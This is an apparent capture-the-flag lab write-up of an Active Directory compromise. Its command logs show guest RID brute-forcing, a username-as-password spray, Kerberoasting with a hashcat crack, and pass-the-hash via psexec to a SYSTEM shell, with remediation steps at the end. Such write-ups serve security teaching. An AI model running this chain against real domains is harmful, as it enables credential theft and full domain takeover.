Case file

AD guest RID brute, Kerberoast, and Pass-the-Hash to SYSTEM

Foundations Active Directory engagement: guest SMB enabled RID brute and username=password spray; Kerberoast cracked file_svc; backup share hashes Pass-the-Hash’d as FileServer$ via PsExec to SYSTEM.

Foundations30 minWindows · Active Directory · Kerberos · Pass-the-Hash
01

Engagement summary

Guest access enumerated users; password spray landed ybob317. Kerberoast recovered file_svc; backup NTLM hashes authenticated FileServer$ for a SYSTEM shell.

SOUPEDECODE 01 (DC01.SOUPEDECODE.LOCAL) presented a full AD port set. Guest SMB with empty password allowed RID brute into a user list. Spraying username=password hit ybob317:ybob317 and the Users share for the user artifact. GetUserSPNs Kerberoasted file_svc; hashcat recovered Password123!!. file_svc could read the backup share’s extract of NTLM hashes; spraying those hashes authenticated FileServer$ (Pwn3d). impacket psexec with the machine-account hash dropped a SYSTEM shell on the DC.

Business impact

Guest RID cycling and password-equals-username are domain footholds. Weak Kerberoastable service passwords and dumped NTLM hashes enable lateral movement to machine accounts. Disable guest, enforce password policy, protect SPN accounts with long random secrets, and restrict backup share ACLs.

02

Guest RID brute and password spray

crackmapexec guest RID brute built users.txt; spray recovered ybob317.

OPERATOR · GUEST / SPRAY

savvy@lab:~$ nmap -sV -sC -Pn 10.201.91.100

88/tcp kerberos 445/tcp smb 389/tcp ldap

savvy@lab:~$ crackmapexec smb 10.201.91.100 -u guest -p '' --rid-brute

savvy@lab:~$ crackmapexec smb 10.201.91.100 -u users.txt -p users.txt --no-bruteforce --continue-on-success

[+] SOUPEDECODE.LOCAL\ybob317 : ybob317

03

Kerberoast file_svc

GetUserSPNs requested TGS hashes; rockyou cracked Password123!! for file_svc.

OPERATOR · KERBEROAST

savvy@lab:~$ python3 GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 10.201.1.205 -request -outputfile hash.txt

savvy@lab:~$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --show

file_svc:Password123!!

04

Backup hashes and Pass-the-Hash SYSTEM

backup_extract.txt NTLM spray hit FileServer$; psexec yielded SYSTEM.

OPERATOR · PTH

savvy@lab:~$ crackmapexec smb 10.201.1.205 -u file_svc -p 'Password123!!' --shares

backup READ

savvy@lab:~$ crackmapexec smb 10.201.1.205 -u users_hashes.txt -H hashes.txt --no-bruteforce

[+] SOUPEDECODE.LOCAL\FileServer$:e41da7e7... (Pwn3d!)

savvy@lab:~$ python3 psexec.py 'soupedecode.local/FileServer$'@10.201.1.205 -hashes 'aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559'

C:\Windows\system32>

C:\Windows\system32> whoami

nt authority\system

Remediation

Disable guest and anonymous RID. Ban password=username. Use gMSA or 25+ char SPN passwords. Encrypt and ACL backup extracts; monitor machine-account logons from unusual hosts.